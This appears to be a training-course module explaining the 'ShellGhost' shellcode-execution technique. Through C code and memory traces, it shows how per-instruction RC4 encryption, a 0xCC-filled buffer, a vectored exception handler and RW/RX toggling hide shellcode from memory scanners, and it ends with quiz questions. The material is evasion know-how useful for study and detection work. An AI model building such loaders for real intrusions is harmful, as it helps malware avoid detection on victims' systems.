Module 4: The ShellGhost Concept
The complete single-instruction execution model — how INT3, VEH, shellcode mapping, SystemFunction032, and RW/RX toggling combine into invisible shellcode.
Module Objective
This module ties together the foundational concepts (INT3 breakpoints, VEH handlers, CONTEXT usage, and per-instruction encryption) into the complete ShellGhost execution model. You will understand the full cycle: how each shellcode instruction is replaced with 0xCC, how a Python preprocessing script maps each instruction for independent encryption, and how the VEH handler re-encrypts the previous instruction and decrypts the current one on each breakpoint — all within a single EXCEPTION_BREAKPOINT handler. This is the conceptual core of lem0nSec's ShellGhost technique.
1. The One-Exception Cycle
ShellGhost's execution revolves around a one-exception cycle that repeats for every instruction in the shellcode. Each iteration involves exactly one exception (EXCEPTION_BREAKPOINT) and one VEH handler invocation that performs both re-encryption of the previous instruction and decryption of the current one:
The ShellGhost One-Exception Cycle
EXCEPTION_BREAKPOINT
Restore 0xCC
SystemFunction032
VirtualProtect
CPU runs decrypted code
Cycle repeats
| Step | Handler Action | Result |
|---|---|---|
| Step 1 | EXCEPTION_BREAKPOINT fires. Handler re-encrypts the previously executed instruction bytes back to 0xCC (if any). | Previous instruction is cleaned up |
| Step 2 | Handler looks up the current instruction in the CRYPT_BYTES_QUOTA array, decrypts it using SystemFunction032 (RC4), and writes the decrypted bytes to the execution buffer. | Current instruction is ready for execution |
| Step 3 | Handler toggles the page from RW to RX via VirtualProtect and returns EXCEPTION_CONTINUE_EXECUTION. | CPU resumes and executes the decrypted instruction, then hits the next 0xCC |
2. Memory State at Each Phase
To make this concrete, let us trace the memory state through two iterations of the cycle. Assume the shellcode starts at address 0x1000. The first instruction is 0x48 0x89 0xE5 (mov rbp, rsp, 3 bytes) and the second is 0x48 0x83 0xEC 0x20 (sub rsp, 0x20, 4 bytes):
Step-by-Step Memory Trace
| Step | Memory at 0x1000-0x1002 | Memory at 0x1003-0x1006 | RIP | Event |
|---|---|---|---|---|
| Initial | CC CC CC | CC CC CC CC | 0x1000 | CPU encounters 0xCC, BREAKPOINT fires |
| After 1st BP handler | 48 89 E5 | CC CC CC CC | 0x1000 | Handler decrypts instruction 1, toggles to RX |
| After instruction 1 executes | 48 89 E5 | CC CC CC CC | 0x1003 | CPU executes mov rbp,rsp; hits next 0xCC, BREAKPOINT fires |
| After 2nd BP handler | CC CC CC | 48 83 EC 20 | 0x1003 | Handler re-encrypts instr 1, decrypts instr 2, toggles to RX |
Important Nuance: Multi-Byte Instructions
x86/x64 instructions can be 1 to 15 bytes long. ShellGhost handles this through the shellcode mapping preprocessing step. The Python script (ShellGhost_mapping.py) disassembles the shellcode ahead of time and records each instruction's offset (RVA) and byte count (quota) in a CRYPT_BYTES_QUOTA struct. At runtime, the VEH handler uses this mapping to know exactly how many bytes to decrypt for the current instruction and how many bytes to re-encrypt from the previous one. There is no need to determine instruction boundaries at runtime.
3. The Handler Logic
ShellGhost's VEH handler performs all work within a single EXCEPTION_BREAKPOINT handler. Each invocation does both re-encryption and decryption:
C// Conceptual handler logic
LONG CALLBACK GhostHandler(PEXCEPTION_POINTERS ep) {
DWORD code = ep->ExceptionRecord->ExceptionCode;
PCONTEXT ctx = ep->ContextRecord;
if (code == EXCEPTION_BREAKPOINT) {
// Rip already points to the 0xCC (kernel adjusted it)
PBYTE current = (PBYTE)ctx->Rip;
// Validate: is this in our execution buffer?
if (!IsInExecBuffer(current))
return EXCEPTION_CONTINUE_SEARCH;
// Step 1: Re-encrypt the PREVIOUS instruction (if any)
// - Toggle to RW via VirtualProtect
// - Write 0xCC back over previous instruction bytes
if (g_ctx.prev_index >= 0) {
ReEncryptPrevious();
}
// Step 2: Decrypt the CURRENT instruction
// - Look up CRYPT_BYTES_QUOTA for current instruction index
// - Use SystemFunction032 to decrypt instruction bytes
// - Write decrypted bytes to execution buffer
DecryptCurrent(g_ctx.current_index);
// Step 3: Toggle memory to RX for execution
VirtualProtect(page, size, PAGE_EXECUTE_READ, &old);
// Step 4: Advance instruction index
g_ctx.prev_index = g_ctx.current_index;
g_ctx.current_index++;
return EXCEPTION_CONTINUE_EXECUTION;
}
// Not our exception
return EXCEPTION_CONTINUE_SEARCH;
}
4. The Data Structures
ShellGhost needs to maintain several pieces of state across handler invocations. These are typically stored in global variables accessible to the VEH handler:
C// Key data structure: per-instruction encryption mapping
// Generated by ShellGhost_mapping.py preprocessing script
typedef struct _CRYPT_BYTES_QUOTA {
DWORD rva; // Offset of this instruction within the shellcode
DWORD quota; // Number of bytes in this instruction
} CRYPT_BYTES_QUOTA;
// Example: first 3 instructions mapped by the preprocessing script
// CRYPT_BYTES_QUOTA map[] = {
// { 0x0000, 3 }, // mov rbp, rsp (3 bytes at offset 0)
// { 0x0003, 4 }, // sub rsp, 0x20 (4 bytes at offset 3)
// { 0x0007, 2 }, // xor ecx, ecx (2 bytes at offset 7)
// ...
// };
// Global state for the ShellGhost handler
typedef struct _GHOST_CONTEXT {
LPVOID exec_buffer; // Base address of the 0xCC-filled RW region
SIZE_T exec_size; // Size of the execution buffer
PBYTE encrypted_sc; // Per-instruction encrypted shellcode bytes
SIZE_T sc_size; // Size of the shellcode
// Instruction mapping (from preprocessing)
CRYPT_BYTES_QUOTA *map; // Array of per-instruction RVA + byte count
DWORD num_instructions; // Total number of mapped instructions
DWORD current_index; // Index of current instruction being executed
// RC4 key for SystemFunction032
BYTE rc4_key[16]; // RC4 encryption key
SIZE_T key_len; // Key length
// Tracking state
INT prev_index; // Index of previously executed instruction (-1 if none)
} GHOST_CONTEXT;
static GHOST_CONTEXT g_ghost = { 0 };
Why Global State?
VEH handlers receive only the EXCEPTION_POINTERS parameter — there is no way to pass custom context. Therefore, ShellGhost stores its state in global (or static) variables. This is safe because the execution buffer is only used by a single thread. If multi-threaded execution were needed, the state would need thread-local storage or synchronization.
5. Setup and Initialization
Before the execution cycle begins, ShellGhost performs these initialization steps:
C// Note: In real ShellGhost, the preprocessing is done OFFLINE
// by ShellGhost_mapping.py. The encrypted data and CRYPT_BYTES_QUOTA
// arrays are compiled directly into the C source as static arrays.
void ShellGhostInit(
PBYTE encrypted_sc, // Pre-encrypted shellcode (from mapping.py)
SIZE_T sc_size,
CRYPT_BYTES_QUOTA *map, // Instruction map (from mapping.py)
DWORD num_instructions,
PBYTE key, SIZE_T key_size
) {
// Step 1: Store encrypted data and mapping references
g_ghost.encrypted_sc = encrypted_sc;
g_ghost.sc_size = sc_size;
g_ghost.map = map;
g_ghost.num_instructions = num_instructions;
memcpy(g_ghost.rc4_key, key, key_size);
g_ghost.key_len = key_size;
g_ghost.prev_index = -1;
g_ghost.current_index = 0;
// Step 2: Allocate execution buffer filled with 0xCC (RW, not RWX)
g_ghost.exec_buffer = VirtualAlloc(NULL, sc_size,
MEM_COMMIT | MEM_RESERVE, PAGE_READWRITE);
memset(g_ghost.exec_buffer, 0xCC, sc_size);
g_ghost.exec_size = sc_size;
// Step 3: Register VEH handler
AddVectoredExceptionHandler(1, GhostHandler);
// Step 4: Create thread at end of .text segment
// ResolveEndofTextSegment() finds null bytes to use as entry
LPVOID entry = ResolveEndofTextSegment();
HANDLE hThread = CreateThread(NULL, 0,
(LPTHREAD_START_ROUTINE)entry, NULL, 0, NULL);
WaitForSingleObject(hThread, INFINITE);
}
6. Address Validation
A critical part of the handler is verifying that the exception originated from within the execution buffer. Without this check, the handler would incorrectly process breakpoints from other sources (debugger breakpoints, other code using INT3, etc.):
C// Check if the address is within our execution buffer
BOOL IsInExecBuffer(PVOID addr) {
return (addr >= g_ghost.exec_buffer) &&
(addr < (PBYTE)g_ghost.exec_buffer + g_ghost.exec_size);
}
LONG CALLBACK GhostHandler(PEXCEPTION_POINTERS ep) {
PCONTEXT ctx = ep->ContextRecord;
if (ep->ExceptionRecord->ExceptionCode == EXCEPTION_BREAKPOINT) {
// For breakpoint: the kernel (KiDispatchException) already
// decremented RIP by 1, so ContextRecord->Rip points directly
// at the 0xCC byte. No manual adjustment needed.
PVOID cc_addr = (PVOID)ctx->Rip;
if (!IsInExecBuffer(cc_addr)) {
return EXCEPTION_CONTINUE_SEARCH; // Not ours
}
// ... handle our breakpoint
}
// ...
}
7. The Complete Conceptual Flow
Here is the entire ShellGhost execution flow from start to finish:
Preprocessing Phase (Offline)
ShellGhost_mapping.pydisassembles the raw shellcode using a disassembler (e.g., Capstone)- Each instruction's offset (RVA) and byte count (quota) are recorded into
CRYPT_BYTES_QUOTAstructs - Each instruction is encrypted independently with RC4 using SystemFunction032
- The encrypted data and mapping arrays are output as C source code to be compiled into the binary
Initialization Phase (Runtime)
- Load the pre-encrypted shellcode data and instruction map (compiled into the binary)
- Allocate a
PAGE_READWRITEregion and fill it entirely with0xCC - Register the VEH handler with
First = 1 - Create a new thread via
CreateThread()with entry at the end of the.textsegment
Execution Cycle (repeats per instruction)
- CPU hits
0xCCat current position → EXCEPTION_BREAKPOINT fires - VEH handler:
ContextRecord->Ripalready points at the 0xCC (kernel adjusted it) - VEH handler: toggle page to RW via VirtualProtect
- VEH handler: re-encrypt the previously executed instruction back to
0xCC(if any) - VEH handler: look up
CRYPT_BYTES_QUOTAfor current instruction index to get RVA and byte count - VEH handler: call SystemFunction032 to decrypt the instruction bytes at that offset
- VEH handler: write the decrypted bytes to the execution buffer
- VEH handler: toggle page to RX via VirtualProtect and return EXCEPTION_CONTINUE_EXECUTION
- CPU executes the decrypted instruction, then encounters the next
0xCC→ cycle repeats from step 1
Termination
When the shellcode executes a ret instruction or otherwise transfers control outside the execution buffer, the next exception (if any) will not pass the address validation check, and normal execution resumes. If the shellcode calls Windows APIs, those calls execute normally without triggering breakpoints (the APIs live outside the execution buffer).
8. What a Memory Scanner Sees
At any point during execution, a memory scanner examining the execution buffer sees:
TextExecution buffer during ShellGhost operation:
Address Content Meaning
0x1000 CC INT3 (already executed and re-encrypted)
0x1001 CC INT3 (already executed and re-encrypted)
0x1002 CC INT3 (already executed and re-encrypted)
0x1003 48 Decrypted instruction (currently executing)
0x1004 83 (part of current instruction)
0x1005 EC (part of current instruction)
0x1006 20 (part of current instruction)
0x1007 CC INT3 (not yet reached)
... CC INT3 (all remaining bytes)
At MOST one instruction is decrypted (~1-15 bytes).
Every other byte is 0xCC.
No shellcode signature. No recognizable pattern. No entropy anomaly.
The "Ghost" Effect
This is why the tool is called ShellGhost. The shellcode is like a ghost — it is there, executing and producing effects, but you cannot observe it. A memory scan shows nothing. A memory dump shows nothing. The shellcode materializes one instruction at a time, executes, and vanishes back into a sea of 0xCC bytes.
Knowledge Check
Q1: How many exceptions does ShellGhost generate per shellcode instruction?
Q2: Why must the VEH handler check if the exception address is within the execution buffer?
Q3: What does the execution buffer contain when a memory scanner reads it during ShellGhost execution?